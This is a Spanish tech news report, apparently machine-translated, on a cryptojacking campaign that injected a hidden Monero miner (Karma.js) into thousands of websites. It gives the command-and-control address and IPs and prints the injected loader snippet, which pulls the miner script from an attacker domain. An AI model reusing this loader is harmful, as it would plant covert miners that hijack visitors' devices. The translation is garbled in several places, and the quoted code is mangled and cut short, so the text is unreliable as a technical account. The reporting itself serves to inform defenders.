Home Tecnología La nueva ola de cripto-hijacking infecta más de 3,500 sitios web

La nueva ola de cripto-hijacking infecta más de 3,500 sitios web

62
0

Una campaña de minería de Monero sigilosa ha comprometido silenciosamente a más de 3.500 sitios web al incorporar un archivo JavaScript de aspecto inocuo llamado Karma.js.

La operación aprovecha la base web, los trabajadores web y las redes web para desviar los ciclos de la CPU mientras mantiene el uso de recursos lo suficientemente bajo para evitar la sospecha del usuario.

Los analistas de CSIDE.dev notaron por primera vez la anomalía después de que los rutinarios marcaron un script ofuscado entregado a través de TrustIsimporter.


El equipo observado No hay llamadas de red iniciales o picos de CPU, sin embargo, el análisis heurístico clasificó la carga útil como maliciosa, lo que provocó un desmontaje más profundo.

Desempacar el código reveló un canal de comando y control en WSS: //lokilokitwo.de: 10006, IPS de alojamiento con codificación dura 89.58.14.251 y 104.21.80.1, y una inclinación por la infraestructura de reciclaje previamente vinculada a las cazas de cita de la tarjeta Magecart.

Al estrangular la intensidad del hash y la distribución del trabajo en los hilos de fondo, el minero mantiene una huella casi invisible incluso en dispositivos móviles.

Esto marca un resurgimiento del criptojacking basado en el navegador, una vez pensado desaparecido después de la desaparición de Coinhive en 2019, pero ahora se refina para evadir tanto las listas negras de anuncios como las defensas mineras de navegador incorporadas.

NOSAJ no sensible = FASTER.MO QUERY (Fuente – Cside.dev)

Las víctimas experimentan solo latencia marginal, extendiendo el tiempo de permanencia y las ganancias acumuladas para los atacantes. Esto muestra el cargador codificado Base64 que inicia la cadena.

Mecanismo de infección sigilosa

La infección comienza con un URI de datos de una sola línea inyectado en una página legítima, a menudo a través de widgets de terceros comprometidos o complementos CMS obsoletos.

Una vez ejecutado, el stub carga dinámicamente el minero real, asigna una ID de elemento aleatorio para evitar las verificaciones de duplicación y engancha un controlador de información que lanza la rutina de bootstrap de todoislife ().

(función (d, s, id) {if (d.getElementById (id)) return; const js = d.createElement (s); js.id = id; js.src = “https://trustisimportant.fun/karma/karma.js?karma=bs”; d.getElementsbytagname (s) (0) .Parentnode. }) (documento, ‘script’, ‘backup-jss’);

Dentro de Karma.js, una sonda de capacidad prueba el navegador.

Limitar la carga de la CPU a aproximadamente el 20% oculta anomalías, exigiendo defensas de integridad de script de tiempo de ejecución.

Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.

Fuente de noticias